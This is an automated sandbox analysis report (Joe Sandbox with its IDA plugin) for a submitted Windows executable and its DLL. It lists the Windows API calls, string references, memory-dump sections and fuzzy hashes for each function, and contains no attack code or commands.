Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14

Function 0040345D Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D

Function 00404394 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19

Function 73F9121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(00000040,?,73F9123B,?,73F912DF,00000019,73F911BE,-000000A0), ref: 73F91225

Memory Dump Source

Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true

Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: fb9fe296f92352b5c61e1a00658be083359e7b4a4960b5ed12ebb0e4c56a4a87
Instruction ID: d44a5fe81393624415e054140ee29c81ac959ffebf2c8106f6e6c6248768d455
Opcode Fuzzy Hash: fb9fe296f92352b5c61e1a00658be083359e7b4a4960b5ed12ebb0e4c56a4a87
Instruction Fuzzy Hash: 35B012B2E00000DFEE00FB65CC26F343654E700341F154000F60EE01B0C12048008534

Non-executed Functions

Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004055ED
GetDlgItem.USER32(?,000003EE), ref: 004055FC
GetClientRect.USER32(?,?), ref: 00405639
GetSystemMetrics.USER32(00000002), ref: 00405640
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
ShowWindow.USER32(?,00000008), ref: 004056DC
GetDlgItem.USER32(?,000003EC), ref: 004056FD
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
GetDlgItem.USER32(?,000003F8), ref: 0040560B

Part of subcall function 00404394: SendMessageW.USER32(00000028,?,?,004041BF), ref: 004043A2

GetDlgItem.USER32(?,000003EC), ref: 0040574F
CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
CloseHandle.KERNEL32(00000000), ref: 00405764
ShowWindow.USER32(00000000), ref: 00405788
ShowWindow.USER32(?,00000008), ref: 0040578D
ShowWindow.USER32(00000008), ref: 004057D7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
CreatePopupMenu.USER32 ref: 0040581C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
GetWindowRect.USER32(?,?), ref: 00405850
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
OpenClipboard.USER32(00000000), ref: 004058B1
EmptyClipboard.USER32 ref: 004058B7
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
GlobalLock.KERNEL32(00000000), ref: 004058CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
GlobalUnlock.KERNEL32(00000000), ref: 00405901
SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
CloseClipboard.USER32 ref: 00405912

Strings

(7B, xrefs: 0040587D
{, xrefs: 004057F5

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
Opcode Fuzzy Hash: 1d1f977673fe441afad02026140f53aaec566053b515a361d3c8f7f727d52ca3
Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68

Function 00404850 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040489F
SetWindowTextW.USER32(00000000,?), ref: 004048C9
SHBrowseForFolderW.SHELL32(?), ref: 0040497A
CoTaskMemFree.OLE32(00000000), ref: 00404985
lstrcmpiW.KERNEL32(Call,00423728,00000000,?,?), ref: 004049B7
lstrcatW.KERNEL32(?,Call), ref: 004049C3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5

Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45

Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
Part of subcall function 0040667C: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
Part of subcall function 0040667C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00435000,00403480,C:\Users\user\AppData\Local\Temp\,761336C0,004036EF,?,00000006,00000008,0000000A), ref: 00406706

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,?,004216F8,?,?,000003FB,?), ref: 00404A98
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3

Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

A, xrefs: 00404973
Call, xrefs: 004049B1, 004049B6, 004049C1
(7B, xrefs: 0040494D

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A$Call
API String ID: 2624150263-413618503
Opcode ID: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
Opcode Fuzzy Hash: 60ed21fe2f328070877fcf4fb1291f079d9e461e65f212612ce38389da6d49e8
Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D

Function 73F91B5F Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 73F9121B: GlobalAlloc.KERNELBASE(00000040,?,73F9123B,?,73F912DF,00000019,73F911BE,-000000A0), ref: 73F91225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73F91C6B
lstrcpyW.KERNEL32(00000008,?), ref: 73F91CB3
lstrcpyW.KERNEL32(00000808,?), ref: 73F91CBD
GlobalFree.KERNEL32(00000000), ref: 73F91CD0
GlobalFree.KERNEL32(?), ref: 73F91DB2
GlobalFree.KERNEL32(?), ref: 73F91DB7
GlobalFree.KERNEL32(?), ref: 73F91DBC
GlobalFree.KERNEL32(00000000), ref: 73F91FA6
lstrcpyW.KERNEL32(?,?), ref: 73F92140
GetModuleHandleW.KERNEL32(00000008), ref: 73F921B5
LoadLibraryW.KERNEL32(00000008), ref: 73F921C6
GetProcAddress.KERNEL32(?,?), ref: 73F92220
lstrlenW.KERNEL32(00000808), ref: 73F9223A

Memory Dump Source

Source File: 00000000.00000002.1691129260.0000000073F91000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F90000, based on PE: true

Associated: 00000000.00000002.1691075383.0000000073F90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691156863.0000000073F94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1691207488.0000000073F96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73f90000_6ZoBPR3isG.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: ed5808789f18b61da79ecbe58c5d675f89753ad1df8c59e3bdd83effaf524e34
Instruction ID: fe0e6fcf7834af0e4c7f86dc53ef970405f16bb1e5ce589e2eb631d90e52895f
Opcode Fuzzy Hash: ed5808789f18b61da79ecbe58c5d675f89753ad1df8c59e3bdd83effaf524e34
Instruction Fuzzy Hash: 4F22BA72D14A0AEFFB26DFA4C9807EEB7F5FB04384F11453AD166E6290D77496808B48

Function 00402104 Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
Instruction ID: a370b0fa9b2e606d6813e98b4c017b265e4ea8c47d708310f479c561ceb58c7b
Opcode Fuzzy Hash: 4630f11a642d4e3ef4f98d2454dc0e8d663bfbe8c95ddff176ede1b1d5b4d77b
Instruction Fuzzy Hash: 80414A71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB54

Function 00402868 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
Instruction ID: e6f127318fd58302517648c6e406f49d0db104963aa8d987e753e5cb7f87edca
Opcode Fuzzy Hash: 6fd2962910cdf18594a7907c322fc030c9e7a26b232b9d9b5d327205302d7dac
Instruction Fuzzy Hash: EDF08271A14104EBDB10DBA4DA499AEB378EF14314F60467BF545F21E0DBB45D809B2A

Function 0040451E Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,?), ref: 004045BC
GetDlgItem.USER32(?,000003E8), ref: 004045D0
SendMessageW.USER32(00000000,0000045B,?,00000000), ref: 004045ED
GetSysColor.USER32(?), ref: 004045FE
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
lstrlenW.KERNEL32(?), ref: 0040461F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
GetDlgItem.USER32(?,0000040A), ref: 0040469A
SendMessageW.USER32(00000000), ref: 004046A1
GetDlgItem.USER32(?,000003E8), ref: 004046CC
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
SetCursor.USER32(00000000), ref: 00404720
LoadCursorW.USER32(00000000,00007F00), ref: 00404739
SetCursor.USER32(00000000), ref: 0040473C
SendMessageW.USER32(00000111,?,00000000), ref: 0040476B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D

Strings

N, xrefs: 004046BA
Call, xrefs: 004046FB

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,?), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,?,004061CF,?,?), ref: 0040606F
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078

Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
wsprintfA.USER32 ref: 004060B3
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
GlobalFree.KERNEL32(00000000), ref: 0040619C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3

Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\6ZoBPR3isG.exe,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405F04

Strings

[Rename], xrefs: 0040611D, 0040612F
%ls=%ls, xrefs: 004060A9

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
Opcode Fuzzy Hash: a8f6130d4aa3065939d725957225dfc1b425243e5004b20d0867480790577512
Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD

Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043E3
GetSysColor.USER32(00000000), ref: 00404421
SetTextColor.GDI32(?,00000000), ref: 0040442D
SetBkMode.GDI32(?,?), ref: 00404439
GetSysColor.USER32(?), ref: 0040444C
SetBkColor.GDI32(?,?), ref: 0040445C
DeleteObject.GDI32(?), ref: 00404476
CreateBrushIndirect.GDI32(?), ref: 00404480

Memory Dump Source

Source File: 00000000.00000002.1649012757.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1648996172.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649034086.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649053605.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1649132043.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6ZoBPR3isG.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54

Function 00405450 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
